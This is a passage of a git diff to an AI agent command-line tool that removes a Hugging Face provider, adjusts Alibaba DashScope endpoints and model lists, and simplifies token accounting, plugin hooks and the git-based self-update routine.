# Use event_message_id as fallback so progress messages land in the
|
||||
# same thread as the final response instead of going to the DM root.
|
||||
_progress_thread_id = source.thread_id or event_message_id
|
||||
_progress_metadata = {"thread_id": _progress_thread_id} if _progress_thread_id else None
|
||||
|
||||
async def send_progress_messages():
|
||||
@@ -5247,25 +5128,7 @@ class GatewayRunner:
|
||||
agent.stream_delta_callback = _stream_delta_cb
|
||||
agent.status_callback = _status_callback_sync
|
||||
agent.reasoning_config = reasoning_config
|
||||
|
||||
# Background review delivery — send "💾 Memory updated" etc. to user
|
||||
def _bg_review_send(message: str) -> None:
|
||||
if not _status_adapter:
|
||||
return
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(
|
||||
_status_adapter.send(
|
||||
_status_chat_id,
|
||||
message,
|
||||
metadata=_status_thread_metadata,
|
||||
),
|
||||
_loop_for_step,
|
||||
)
|
||||
except Exception as _e:
|
||||
logger.debug("background_review_callback error: %s", _e)
|
||||
|
||||
agent.background_review_callback = _bg_review_send
|
||||
|
||||
|
||||
# Store agent reference for interrupt support
|
||||
agent_holder[0] = agent
|
||||
# Capture the full tool definitions for transcript logging
|
||||
|
||||
+7
-14
@@ -762,16 +762,14 @@ class SessionStore:
|
||||
if session_key in self._entries:
|
||||
entry = self._entries[session_key]
|
||||
entry.updated_at = _now()
|
||||
# Direct assignment — the gateway receives cumulative totals
|
||||
# from the cached agent, not per-call deltas.
|
||||
entry.input_tokens = input_tokens
|
||||
entry.output_tokens = output_tokens
|
||||
entry.cache_read_tokens = cache_read_tokens
|
||||
entry.cache_write_tokens = cache_write_tokens
|
||||
entry.input_tokens += input_tokens
|
||||
entry.output_tokens += output_tokens
|
||||
entry.cache_read_tokens += cache_read_tokens
|
||||
entry.cache_write_tokens += cache_write_tokens
|
||||
if last_prompt_tokens is not None:
|
||||
entry.last_prompt_tokens = last_prompt_tokens
|
||||
if estimated_cost_usd is not None:
|
||||
entry.estimated_cost_usd = estimated_cost_usd
|
||||
entry.estimated_cost_usd += estimated_cost_usd
|
||||
if cost_status:
|
||||
entry.cost_status = cost_status
|
||||
entry.total_tokens = (
|
||||
@@ -785,7 +783,7 @@ class SessionStore:
|
||||
|
||||
if self._db and db_session_id:
|
||||
try:
|
||||
self._db.set_token_counts(
|
||||
self._db.update_token_counts(
|
||||
db_session_id,
|
||||
input_tokens=input_tokens,
|
||||
output_tokens=output_tokens,
|
||||
@@ -797,7 +795,6 @@ class SessionStore:
|
||||
billing_provider=provider,
|
||||
billing_base_url=base_url,
|
||||
model=model,
|
||||
absolute=True,
|
||||
)
|
||||
except Exception as e:
|
||||
logger.debug("Session DB operation failed: %s", e)
|
||||
@@ -958,17 +955,13 @@ class SessionStore:
|
||||
try:
|
||||
self._db.clear_messages(session_id)
|
||||
for msg in messages:
|
||||
role = msg.get("role", "unknown")
|
||||
self._db.append_message(
|
||||
session_id=session_id,
|
||||
role=role,
|
||||
role=msg.get("role", "unknown"),
|
||||
content=msg.get("content"),
|
||||
tool_name=msg.get("tool_name"),
|
||||
tool_calls=msg.get("tool_calls"),
|
||||
tool_call_id=msg.get("tool_call_id"),
|
||||
reasoning=msg.get("reasoning") if role == "assistant" else None,
|
||||
reasoning_details=msg.get("reasoning_details") if role == "assistant" else None,
|
||||
codex_reasoning_items=msg.get("codex_reasoning_items") if role == "assistant" else None,
|
||||
)
|
||||
except Exception as e:
|
||||
logger.debug("Failed to rewrite transcript in DB: %s", e)
|
||||
|
||||
+1
-10
@@ -160,7 +160,7 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
|
||||
id="alibaba",
|
||||
name="Alibaba Cloud (DashScope)",
|
||||
auth_type="api_key",
|
||||
inference_base_url="https://coding-intl.dashscope.aliyuncs.com/v1",
|
||||
inference_base_url="https://dashscope-intl.aliyuncs.com/apps/anthropic",
|
||||
api_key_env_vars=("DASHSCOPE_API_KEY",),
|
||||
base_url_env_var="DASHSCOPE_BASE_URL",
|
||||
),
|
||||
@@ -212,14 +212,6 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
|
||||
api_key_env_vars=("KILOCODE_API_KEY",),
|
||||
base_url_env_var="KILOCODE_BASE_URL",
|
||||
),
|
||||
"huggingface": ProviderConfig(
|
||||
id="huggingface",
|
||||
name="Hugging Face",
|
||||
auth_type="api_key",
|
||||
inference_base_url="https://router.huggingface.co/v1",
|
||||
api_key_env_vars=("HF_TOKEN",),
|
||||
base_url_env_var="HF_BASE_URL",
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
@@ -693,7 +685,6 @@ def resolve_provider(
|
||||
"github-copilot-acp": "copilot-acp", "copilot-acp-agent": "copilot-acp",
|
||||
"aigateway": "ai-gateway", "vercel": "ai-gateway", "vercel-ai-gateway": "ai-gateway",
|
||||
"opencode": "opencode-zen", "zen": "opencode-zen",
|
||||
"hf": "huggingface", "hugging-face": "huggingface", "huggingface-hub": "huggingface",
|
||||
"go": "opencode-go", "opencode-go-sub": "opencode-go",
|
||||
"kilo": "kilocode", "kilo-code": "kilocode", "kilo-gateway": "kilocode",
|
||||
}
|
||||
|
||||
+2
-18
@@ -264,7 +264,6 @@ DEFAULT_CONFIG = {
|
||||
"compact": False,
|
||||
"personality": "kawaii",
|
||||
"resume_display": "full",
|
||||
"busy_input_mode": "interrupt",
|
||||
"bell_on_complete": False,
|
||||
"show_reasoning": False,
|
||||
"streaming": False,
|
||||
@@ -547,14 +546,14 @@ OPTIONAL_ENV_VARS = {
|
||||
"category": "provider",
|
||||
},
|
||||
"DASHSCOPE_API_KEY": {
|
||||
"description": "Alibaba Cloud DashScope API key (Qwen + multi-provider models)",
|
||||
"description": "Alibaba Cloud DashScope API key for Qwen models",
|
||||
"prompt": "DashScope API Key",
|
||||
"url": "https://modelstudio.console.alibabacloud.com/",
|
||||
"password": True,
|
||||
"category": "provider",
|
||||
},
|
||||
"DASHSCOPE_BASE_URL": {
|
||||
"description": "Custom DashScope base URL (default: coding-intl OpenAI-compat endpoint)",
|
||||
"description": "Custom DashScope base URL (default: international endpoint)",
|
||||
"prompt": "DashScope Base URL",
|
||||
"url": "",
|
||||
"password": False,
|
||||
@@ -593,21 +592,6 @@ OPTIONAL_ENV_VARS = {
|
||||
"category": "provider",
|
||||
"advanced": True,
|
||||
},
|
||||
"HF_TOKEN": {
|
||||
"description": "Hugging Face token for Inference Providers (20+ open models via router.huggingface.co)",
|
||||
"prompt": "Hugging Face Token",
|
||||
"url": "https://huggingface.co/settings/tokens",
|
||||
"password": True,
|
||||
"category": "provider",
|
||||
},
|
||||
"HF_BASE_URL": {
|
||||
"description": "Hugging Face Inference Providers base URL override",
|
||||
"prompt": "HF base URL (leave empty for default)",
|
||||
"url": None,
|
||||
"password": False,
|
||||
"category": "provider",
|
||||
"advanced": True,
|
||||
},
|
||||
|
||||
# ── Tool API keys ──
|
||||
"PARALLEL_API_KEY": {
|
||||
|
||||
+2
-19
@@ -420,17 +420,6 @@ def get_hermes_cli_path() -> str:
|
||||
# Systemd (Linux)
|
||||
# =============================================================================
|
||||
|
||||
def _build_user_local_paths(home: Path, path_entries: list[str]) -> list[str]:
|
||||
"""Return user-local bin dirs that exist and aren't already in *path_entries*."""
|
||||
candidates = [
|
||||
str(home / ".local" / "bin"), # uv, uvx, pip-installed CLIs
|
||||
str(home / ".cargo" / "bin"), # Rust/cargo tools
|
||||
str(home / "go" / "bin"), # Go tools
|
||||
str(home / ".npm-global" / "bin"), # npm global packages
|
||||
]
|
||||
return [p for p in candidates if p not in path_entries and Path(p).exists()]
|
||||
|
||||
|
||||
def generate_systemd_unit(system: bool = False, run_as_user: str | None = None) -> str:
|
||||
python_path = get_python_path()
|
||||
working_dir = str(PROJECT_ROOT)
|
||||
@@ -445,16 +434,13 @@ def generate_systemd_unit(system: bool = False, run_as_user: str | None = None)
|
||||
resolved_node_dir = str(Path(resolved_node).resolve().parent)
|
||||
if resolved_node_dir not in path_entries:
|
||||
path_entries.append(resolved_node_dir)
|
||||
path_entries.extend(["/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"])
|
||||
sane_path = ":".join(path_entries)
|
||||
|
||||
hermes_home = str(get_hermes_home().resolve())
|
||||
|
||||
common_bin_paths = ["/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"]
|
||||
|
||||
if system:
|
||||
username, group_name, home_dir = _system_service_identity(run_as_user)
|
||||
path_entries.extend(_build_user_local_paths(Path(home_dir), path_entries))
|
||||
path_entries.extend(common_bin_paths)
|
||||
sane_path = ":".join(path_entries)
|
||||
return f"""[Unit]
|
||||
Description={SERVICE_DESCRIPTION}
|
||||
After=network-online.target
|
||||
@@ -486,9 +472,6 @@ StandardError=journal
|
||||
WantedBy=multi-user.target
|
||||
"""
|
||||
|
||||
path_entries.extend(_build_user_local_paths(Path.home(), path_entries))
|
||||
path_entries.extend(common_bin_paths)
|
||||
sane_path = ":".join(path_entries)
|
||||
return f"""[Unit]
|
||||
Description={SERVICE_DESCRIPTION}
|
||||
After=network.target
|
||||
|
||||
+40
-133
@@ -795,7 +795,6 @@ def cmd_model(args):
|
||||
"ai-gateway": "AI Gateway",
|
||||
"kilocode": "Kilo Code",
|
||||
"alibaba": "Alibaba Cloud (DashScope)",
|
||||
"huggingface": "Hugging Face",
|
||||
"custom": "Custom endpoint",
|
||||
}
|
||||
active_label = provider_labels.get(active, active)
|
||||
@@ -821,8 +820,7 @@ def cmd_model(args):
|
||||
("opencode-zen", "OpenCode Zen (35+ curated models, pay-as-you-go)"),
|
||||
("opencode-go", "OpenCode Go (open models, $10/month subscription)"),
|
||||
("ai-gateway", "AI Gateway (Vercel — 200+ models, pay-per-use)"),
|
||||
("alibaba", "Alibaba Cloud / DashScope Coding (Qwen + multi-provider)"),
|
||||
("huggingface", "Hugging Face Inference Providers (20+ open models)"),
|
||||
("alibaba", "Alibaba Cloud / DashScope (Qwen models, Anthropic-compatible)"),
|
||||
]
|
||||
|
||||
# Add user-defined custom providers from config.yaml
|
||||
@@ -832,8 +830,8 @@ def cmd_model(args):
|
||||
for entry in custom_providers_cfg:
|
||||
if not isinstance(entry, dict):
|
||||
continue
|
||||
name = (entry.get("name") or "").strip()
|
||||
base_url = (entry.get("base_url") or "").strip()
|
||||
name = entry.get("name", "").strip()
|
||||
base_url = entry.get("base_url", "").strip()
|
||||
if not name or not base_url:
|
||||
continue
|
||||
# Generate a stable key from the name
|
||||
@@ -895,7 +893,7 @@ def cmd_model(args):
|
||||
_model_flow_anthropic(config, current_model)
|
||||
elif selected_provider == "kimi-coding":
|
||||
_model_flow_kimi(config, current_model)
|
||||
elif selected_provider in ("zai", "minimax", "minimax-cn", "kilocode", "opencode-zen", "opencode-go", "ai-gateway", "alibaba", "huggingface"):
|
||||
elif selected_provider in ("zai", "minimax", "minimax-cn", "kilocode", "opencode-zen", "opencode-go", "ai-gateway", "alibaba"):
|
||||
_model_flow_api_key_provider(config, selected_provider, current_model)
|
||||
|
||||
|
||||
@@ -1504,18 +1502,6 @@ _PROVIDER_MODELS = {
|
||||
"google/gemini-3-pro-preview",
|
||||
"google/gemini-3-flash-preview",
|
||||
],
|
||||
# Curated HF model list — only agentic models that map to OpenRouter defaults.
|
||||
# Format: HF model ID → OpenRouter equivalent noted in comment
|
||||
"huggingface": [
|
||||
"Qwen/Qwen3.5-397B-A17B", # ↔ qwen/qwen3.5-plus
|
||||
"Qwen/Qwen3.5-35B-A3B", # ↔ qwen/qwen3.5-35b-a3b
|
||||
"deepseek-ai/DeepSeek-V3.2", # ↔ deepseek/deepseek-chat
|
||||
"moonshotai/Kimi-K2.5", # ↔ moonshotai/kimi-k2.5
|
||||
"MiniMaxAI/MiniMax-M2.5", # ↔ minimax/minimax-m2.5
|
||||
"zai-org/GLM-5", # ↔ z-ai/glm-5
|
||||
"XiaomiMiMo/MiMo-V2-Flash", # ↔ xiaomi/mimo-v2-pro
|
||||
"moonshotai/Kimi-K2-Thinking", # ↔ moonshotai/kimi-k2-thinking
|
||||
],
|
||||
}
|
||||
|
||||
|
||||
@@ -2045,25 +2031,19 @@ def _model_flow_api_key_provider(config, provider_id, current_model=""):
|
||||
save_env_value(base_url_env, override)
|
||||
effective_base = override
|
||||
|
||||
# Model selection — try live /models endpoint first, fall back to defaults.
|
||||
# Providers with large live catalogs (100+ models) use a curated list instead
|
||||
# so users see familiar model names rather than an overwhelming dump.
|
||||
curated = _PROVIDER_MODELS.get(provider_id, [])
|
||||
if curated and len(curated) >= 8:
|
||||
# Curated list is substantial — use it directly, skip live probe
|
||||
live_models = None
|
||||
else:
|
||||
from hermes_cli.models import fetch_api_models
|
||||
api_key_for_probe = existing_key or (get_env_value(key_env) if key_env else "")
|
||||
live_models = fetch_api_models(api_key_for_probe, effective_base)
|
||||
# Model selection — try live /models endpoint first, fall back to defaults
|
||||
from hermes_cli.models import fetch_api_models
|
||||
api_key_for_probe = existing_key or (get_env_value(key_env) if key_env else "")
|
||||
live_models = fetch_api_models(api_key_for_probe, effective_base)
|
||||
|
||||
if live_models:
|
||||
model_list = live_models
|
||||
print(f" Found {len(model_list)} model(s) from {pconfig.name} API")
|
||||
else:
|
||||
model_list = curated
|
||||
model_list = _PROVIDER_MODELS.get(provider_id, [])
|
||||
if model_list:
|
||||
print(f" Showing {len(model_list)} curated models — use \"Enter custom model name\" for others.")
|
||||
print(" ⚠ Could not auto-detect models from API — showing defaults.")
|
||||
print(" Use \"Enter custom model name\" if you don't see your model.")
|
||||
# else: no defaults either, will fall through to raw input
|
||||
|
||||
if model_list:
|
||||
@@ -2632,12 +2612,7 @@ def _restore_stashed_changes(
|
||||
print("Resolve conflicts manually, then run: git stash drop")
|
||||
|
||||
print(f"Restore your changes with: git stash apply {stash_ref}")
|
||||
# In non-interactive mode (gateway /update), don't abort — the code
|
||||
# update itself succeeded, only the stash restore had conflicts.
|
||||
# Aborting would report the entire update as failed.
|
||||
if prompt_user:
|
||||
sys.exit(1)
|
||||
return False
|
||||
sys.exit(1)
|
||||
|
||||
stash_selector = _resolve_stash_selector(git_cmd, cwd, stash_ref)
|
||||
if stash_selector is None:
|
||||
@@ -2711,60 +2686,30 @@ def cmd_update(args):
|
||||
|
||||
# Fetch and pull
|
||||
try:
|
||||
print("→ Fetching updates...")
|
||||
git_cmd = ["git"]
|
||||
if sys.platform == "win32":
|
||||
git_cmd = ["git", "-c", "windows.appendAtomically=false"]
|
||||
|
||||
print("→ Fetching updates...")
|
||||
fetch_result = subprocess.run(
|
||||
git_cmd + ["fetch", "origin"],
|
||||
cwd=PROJECT_ROOT,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
)
|
||||
if fetch_result.returncode != 0:
|
||||
stderr = fetch_result.stderr.strip()
|
||||
if "Could not resolve host" in stderr or "unable to access" in stderr:
|
||||
print("✗ Network error — cannot reach the remote repository.")
|
||||
print(f" {stderr.splitlines()[0]}" if stderr else "")
|
||||
elif "Authentication failed" in stderr or "could not read Username" in stderr:
|
||||
print("✗ Authentication failed — check your git credentials or SSH key.")
|
||||
else:
|
||||
print(f"✗ Failed to fetch updates from origin.")
|
||||
if stderr:
|
||||
print(f" {stderr.splitlines()[0]}")
|
||||
sys.exit(1)
|
||||
|
||||
# Get current branch (returns literal "HEAD" when detached)
|
||||
|
||||
subprocess.run(git_cmd + ["fetch", "origin"], cwd=PROJECT_ROOT, check=True)
|
||||
|
||||
# Get current branch
|
||||
result = subprocess.run(
|
||||
git_cmd + ["rev-parse", "--abbrev-ref", "HEAD"],
|
||||
cwd=PROJECT_ROOT,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
check=True,
|
||||
check=True
|
||||
)
|
||||
current_branch = result.stdout.strip()
|
||||
branch = result.stdout.strip()
|
||||
|
||||
# Always update against main
|
||||
branch = "main"
|
||||
|
||||
# If user is on a non-main branch or detached HEAD, switch to main
|
||||
if current_branch != "main":
|
||||
label = "detached HEAD" if current_branch == "HEAD" else f"branch '{current_branch}'"
|
||||
print(f" ⚠ Currently on {label} — switching to main for update...")
|
||||
# Stash before checkout so uncommitted work isn't lost
|
||||
auto_stash_ref = _stash_local_changes_if_needed(git_cmd, PROJECT_ROOT)
|
||||
subprocess.run(
|
||||
git_cmd + ["checkout", "main"],
|
||||
cwd=PROJECT_ROOT,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
check=True,
|
||||
)
|
||||
else:
|
||||
auto_stash_ref = _stash_local_changes_if_needed(git_cmd, PROJECT_ROOT)
|
||||
|
||||
prompt_for_restore = auto_stash_ref is not None and sys.stdin.isatty() and sys.stdout.isatty()
|
||||
# Fall back to main if the current branch doesn't exist on the remote
|
||||
verify = subprocess.run(
|
||||
git_cmd + ["rev-parse", "--verify", f"origin/{branch}"],
|
||||
cwd=PROJECT_ROOT, capture_output=True, text=True,
|
||||
)
|
||||
if verify.returncode != 0:
|
||||
branch = "main"
|
||||
|
||||
# Check if there are updates
|
||||
result = subprocess.run(
|
||||
@@ -2772,69 +2717,31 @@ def cmd_update(args):
|
||||
cwd=PROJECT_ROOT,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
check=True,
|
||||
check=True
|
||||
)
|
||||
commit_count = int(result.stdout.strip())
|
||||
|
||||
|
||||
if commit_count == 0:
|
||||
_invalidate_update_cache()
|
||||
# Restore stash and switch back to original branch if we moved
|
||||
if auto_stash_ref is not None:
|
||||
_restore_stashed_changes(
|
||||
git_cmd, PROJECT_ROOT, auto_stash_ref,
|
||||
prompt_user=prompt_for_restore,
|
||||
)
|
||||
if current_branch not in ("main", "HEAD"):
|
||||
subprocess.run(
|
||||
git_cmd + ["checkout", current_branch],
|
||||
cwd=PROJECT_ROOT, capture_output=True, text=True, check=False,
|
||||
)
|
||||
print("✓ Already up to date!")
|
||||
return
|
||||
|
||||
|
||||
print(f"→ Found {commit_count} new commit(s)")
|
||||
|
||||
auto_stash_ref = _stash_local_changes_if_needed(git_cmd, PROJECT_ROOT)
|
||||
prompt_for_restore = auto_stash_ref is not None and sys.stdin.isatty() and sys.stdout.isatty()
|
||||
|
||||
print("→ Pulling updates...")
|
||||
update_succeeded = False
|
||||
try:
|
||||
pull_result = subprocess.run(
|
||||
git_cmd + ["pull", "--ff-only", "origin", branch],
|
||||
cwd=PROJECT_ROOT,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
)
|
||||
if pull_result.returncode != 0:
|
||||
# ff-only failed — local and remote have diverged (e.g. upstream
|
||||
# force-pushed or rebase). Since local changes are already
|
||||
# stashed, reset to match the remote exactly.
|
||||
print(" ⚠ Fast-forward not possible (history diverged), resetting to match remote...")
|
||||
reset_result = subprocess.run(
|
||||
git_cmd + ["reset", "--hard", f"origin/{branch}"],
|
||||
cwd=PROJECT_ROOT,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
)
|
||||
if reset_result.returncode != 0:
|
||||
print(f"✗ Failed to reset to origin/{branch}.")
|
||||
if reset_result.stderr.strip():
|
||||
print(f" {reset_result.stderr.strip()}")
|
||||
print(" Try manually: git fetch origin && git reset --hard origin/main")
|
||||
sys.exit(1)
|
||||
update_succeeded = True
|
||||
subprocess.run(git_cmd + ["pull", "--ff-only", "origin", branch], cwd=PROJECT_ROOT, check=True)
|
||||
finally:
|
||||
if auto_stash_ref is not None:
|
||||
# Don't attempt stash restore if the code update itself failed —
|
||||
# working tree is in an unknown state.
|
||||
if not update_succeeded:
|
||||
print(f" ℹ️ Local changes preserved in stash (ref: {auto_stash_ref})")
|
||||
print(f" Restore manually with: git stash apply")
|
||||
else:
|
||||
_restore_stashed_changes(
|
||||
git_cmd,
|
||||
PROJECT_ROOT,
|
||||
auto_stash_ref,
|
||||
prompt_user=prompt_for_restore,
|
||||
)
|
||||
_restore_stashed_changes(
|
||||
git_cmd,
|
||||
PROJECT_ROOT,
|
||||
auto_stash_ref,
|
||||
prompt_user=prompt_for_restore,
|
||||
)
|
||||
|
||||
_invalidate_update_cache()
|
||||
|
||||
@@ -3215,7 +3122,7 @@ For more help on a command:
|
||||
)
|
||||
chat_parser.add_argument(
|
||||
"--provider",
|
||||
choices=["auto", "openrouter", "nous", "openai-codex", "copilot-acp", "copilot", "anthropic", "huggingface", "zai", "kimi-coding", "minimax", "minimax-cn", "kilocode"],
|
||||
choices=["auto", "openrouter", "nous", "openai-codex", "copilot-acp", "copilot", "anthropic", "zai", "kimi-coding", "minimax", "minimax-cn", "kilocode"],
|
||||
default=None,
|
||||
help="Inference provider (default: auto)"
|
||||
)
|
||||
|
||||
+5
-26
@@ -208,31 +208,14 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
|
||||
"google/gemini-3-pro-preview",
|
||||
"google/gemini-3-flash-preview",
|
||||
],
|
||||
# Alibaba DashScope Coding platform (coding-intl) — default endpoint.
|
||||
# Supports Qwen models + third-party providers (GLM, Kimi, MiniMax).
|
||||
# Users with classic DashScope keys should override DASHSCOPE_BASE_URL
|
||||
# to https://dashscope-intl.aliyuncs.com/compatible-mode/v1 (OpenAI-compat)
|
||||
# or https://dashscope-intl.aliyuncs.com/apps/anthropic (Anthropic-compat).
|
||||
"alibaba": [
|
||||
"qwen3.5-plus",
|
||||
"qwen3-max",
|
||||
"qwen3-coder-plus",
|
||||
"qwen3-coder-next",
|
||||
# Third-party models available on coding-intl
|
||||
"glm-5",
|
||||
"glm-4.7",
|
||||
"kimi-k2.5",
|
||||
"MiniMax-M2.5",
|
||||
],
|
||||
# Curated HF model list — only agentic models that map to OpenRouter defaults.
|
||||
"huggingface": [
|
||||
"Qwen/Qwen3.5-397B-A17B",
|
||||
"Qwen/Qwen3.5-35B-A3B",
|
||||
"deepseek-ai/DeepSeek-V3.2",
|
||||
"moonshotai/Kimi-K2.5",
|
||||
"MiniMaxAI/MiniMax-M2.5",
|
||||
"zai-org/GLM-5",
|
||||
"XiaomiMiMo/MiMo-V2-Flash",
|
||||
"moonshotai/Kimi-K2-Thinking",
|
||||
"qwen-plus-latest",
|
||||
"qwen3.5-flash",
|
||||
"qwen-vl-max",
|
||||
],
|
||||
}
|
||||
|
||||
@@ -253,7 +236,6 @@ _PROVIDER_LABELS = {
|
||||
"ai-gateway": "AI Gateway",
|
||||
"kilocode": "Kilo Code",
|
||||
"alibaba": "Alibaba Cloud (DashScope)",
|
||||
"huggingface": "Hugging Face",
|
||||
"custom": "Custom endpoint",
|
||||
}
|
||||
|
||||
@@ -289,9 +271,6 @@ _PROVIDER_ALIASES = {
|
||||
"aliyun": "alibaba",
|
||||
"qwen": "alibaba",
|
||||
"alibaba-cloud": "alibaba",
|
||||
"hf": "huggingface",
|
||||
"hugging-face": "huggingface",
|
||||
"huggingface-hub": "huggingface",
|
||||
}
|
||||
|
||||
|
||||
@@ -325,7 +304,7 @@ def list_available_providers() -> list[dict[str, str]]:
|
||||
# Canonical providers in display order
|
||||
_PROVIDER_ORDER = [
|
||||
"openrouter", "nous", "openai-codex", "copilot", "copilot-acp",
|
||||
"huggingface", "zai", "kimi-coding", "minimax", "minimax-cn", "kilocode", "anthropic", "alibaba",
|
||||
"zai", "kimi-coding", "minimax", "minimax-cn", "kilocode", "anthropic", "alibaba",
|
||||
"opencode-zen", "opencode-go",
|
||||
"ai-gateway", "deepseek", "custom",
|
||||
]
|
||||
|
||||
+5
-16
@@ -385,23 +385,16 @@ class PluginManager:
|
||||
# Hook invocation
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
def invoke_hook(self, hook_name: str, **kwargs: Any) -> List[Any]:
|
||||
def invoke_hook(self, hook_name: str, **kwargs: Any) -> None:
|
||||
"""Call all registered callbacks for *hook_name*.
|
||||
|
||||
Each callback is wrapped in its own try/except so a misbehaving
|
||||
plugin cannot break the core agent loop.
|
||||
|
||||
Returns a list of non-``None`` return values from callbacks.
|
||||
This allows hooks like ``pre_llm_call`` to contribute context
|
||||
that the agent core can collect and inject.
|
||||
"""
|
||||
callbacks = self._hooks.get(hook_name, [])
|
||||
results: List[Any] = []
|
||||
for cb in callbacks:
|
||||
try:
|
||||
ret = cb(**kwargs)
|
||||
if ret is not None:
|
||||
results.append(ret)
|
||||
cb(**kwargs)
|
||||
except Exception as exc:
|
||||
logger.warning(
|
||||
"Hook '%s' callback %s raised: %s",
|
||||
@@ -409,7 +402,6 @@ class PluginManager:
|
||||
getattr(cb, "__name__", repr(cb)),
|
||||
exc,
|
||||
)
|
||||
return results
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Introspection
|
||||
@@ -454,12 +446,9 @@ def discover_plugins() -> None:
|
||||
get_plugin_manager().discover_and_load()
|
||||
|
||||
|
||||
def invoke_hook(hook_name: str, **kwargs: Any) -> List[Any]:
|
||||
"""Invoke a lifecycle hook on all loaded plugins.
|
||||
|
||||
Returns a list of non-``None`` return values from plugin callbacks.
|
||||
"""
|
||||
return get_plugin_manager().invoke_hook(hook_name, **kwargs)
|
||||
def invoke_hook(hook_name: str, **kwargs: Any) -> None:
|
||||
"""Invoke a lifecycle hook on all loaded plugins."""
|
||||
get_plugin_manager().invoke_hook(hook_name, **kwargs)
|
||||
|
||||
|
||||
def get_plugin_tool_names() -> Set[str]:
|
||||
|
||||
@@ -63,8 +63,8 @@ def _get_model_config() -> Dict[str, Any]:
|
||||
model_cfg = config.get("model")
|
||||
if isinstance(model_cfg, dict):
|
||||
cfg = dict(model_cfg)
|
||||
default = (cfg.get("default") or "").strip()
|
||||
base_url = (cfg.get("base_url") or "").strip()
|
||||
default = cfg.get("default", "").strip()
|
||||
base_url = cfg.get("base_url", "").strip()
|
||||
is_local = "localhost" in base_url or "127.0.0.1" in base_url
|
||||
is_fallback = not default or default == "anthropic/claude-opus-4.6"
|
||||
if is_local and is_fallback and base_url:
|
||||
@@ -407,6 +407,12 @@ def resolve_runtime_provider(
|
||||
# (e.g. https://api.minimax.io/anthropic, https://dashscope.../anthropic)
|
||||
elif base_url.rstrip("/").endswith("/anthropic"):
|
||||
api_mode = "anthropic_messages"
|
||||
# MiniMax providers always use Anthropic Messages API.
|
||||
# Auto-correct stale /v1 URLs (from old .env or config) to /anthropic.
|
||||
elif provider in ("minimax", "minimax-cn"):
|
||||
api_mode = "anthropic_messages"
|
||||
if base_url.rstrip("/").endswith("/v1"):
|
||||
base_url = base_url.rstrip("/")[:-3] + "/anthropic"
|
||||
return {
|
||||
"provider": provider,
|
||||
"api_mode": api_mode,
|
||||
|
||||
+15
-143
@@ -80,11 +80,6 @@ _DEFAULT_PROVIDER_MODELS = {
|
||||
"minimax-cn": ["MiniMax-M2.7", "MiniMax-M2.7-highspeed", "MiniMax-M2.5", "MiniMax-M2.5-highspeed", "MiniMax-M2.1"],
|
||||
"ai-gateway": ["anthropic/claude-opus-4.6", "anthropic/claude-sonnet-4.6", "openai/gpt-5", "google/gemini-3-flash"],
|
||||
"kilocode": ["anthropic/claude-opus-4.6", "anthropic/claude-sonnet-4.6", "openai/gpt-5.4", "google/gemini-3-pro-preview", "google/gemini-3-flash-preview"],
|
||||
"huggingface": [
|
||||
"Qwen/Qwen3.5-397B-A17B", "Qwen/Qwen3-235B-A22B-Thinking-2507",
|
||||
"Qwen/Qwen3-Coder-480B-A35B-Instruct", "deepseek-ai/DeepSeek-R1-0528",
|
||||
"deepseek-ai/DeepSeek-V3.2", "moonshotai/Kimi-K2.5",
|
||||
],
|
||||
}
|
||||
|
||||
|
||||
@@ -889,7 +884,6 @@ def setup_model_provider(config: dict):
|
||||
"OpenCode Go (open models, $10/month subscription)",
|
||||
"GitHub Copilot (uses GITHUB_TOKEN or gh auth token)",
|
||||
"GitHub Copilot ACP (spawns `copilot --acp --stdio`)",
|
||||
"Hugging Face Inference Providers (20+ open models)",
|
||||
]
|
||||
if keep_label:
|
||||
provider_choices.append(keep_label)
|
||||
@@ -1534,26 +1528,7 @@ def setup_model_provider(config: dict):
|
||||
_set_model_provider(config, "copilot-acp", pconfig.inference_base_url)
|
||||
selected_base_url = pconfig.inference_base_url
|
||||
|
||||
elif provider_idx == 16: # Hugging Face Inference Providers
|
||||
selected_provider = "huggingface"
|
||||
print()
|
||||
print_header("Hugging Face API Token")
|
||||
pconfig = PROVIDER_REGISTRY["huggingface"]
|
||||
print_info(f"Provider: {pconfig.name}")
|
||||
print_info("Get your token at: https://huggingface.co/settings/tokens")
|
||||
print_info("Required permission: 'Make calls to Inference Providers'")
|
||||
print()
|
||||
|
||||
api_key = prompt(" HF Token", password=True)
|
||||
if api_key:
|
||||
save_env_value("HF_TOKEN", api_key)
|
||||
# Clear OpenRouter env vars to prevent routing confusion
|
||||
save_env_value("OPENAI_BASE_URL", "")
|
||||
save_env_value("OPENAI_API_KEY", "")
|
||||
_set_model_provider(config, "huggingface", pconfig.inference_base_url)
|
||||
selected_base_url = pconfig.inference_base_url
|
||||
|
||||
# else: provider_idx == 17 (Keep current) — only shown when a provider already exists
|
||||
# else: provider_idx == 16 (Keep current) — only shown when a provider already exists
|
||||
# Normalize "keep current" to an explicit provider so downstream logic
|
||||
# doesn't fall back to the generic OpenRouter/static-model path.
|
||||
if selected_provider is None:
|
||||
@@ -2092,11 +2067,11 @@ def setup_terminal_backend(config: dict):
|
||||
print_info("Serverless cloud sandboxes. Each session gets its own container.")
|
||||
print_info("Requires a Modal account: https://modal.com")
|
||||
|
||||
# Check if modal SDK is installed
|
||||
# Check if swe-rex[modal] is installed
|
||||
try:
|
||||
__import__("modal")
|
||||
__import__("swe_rex")
|
||||
except ImportError:
|
||||
print_info("Installing modal SDK...")
|
||||
print_info("Installing swe-rex[modal]...")
|
||||
import subprocess
|
||||
|
||||
uv_bin = shutil.which("uv")
|
||||
@@ -2108,22 +2083,22 @@ def setup_terminal_backend(config: dict):
|
||||
"install",
|
||||
"--python",
|
||||
sys.executable,
|
||||
"modal",
|
||||
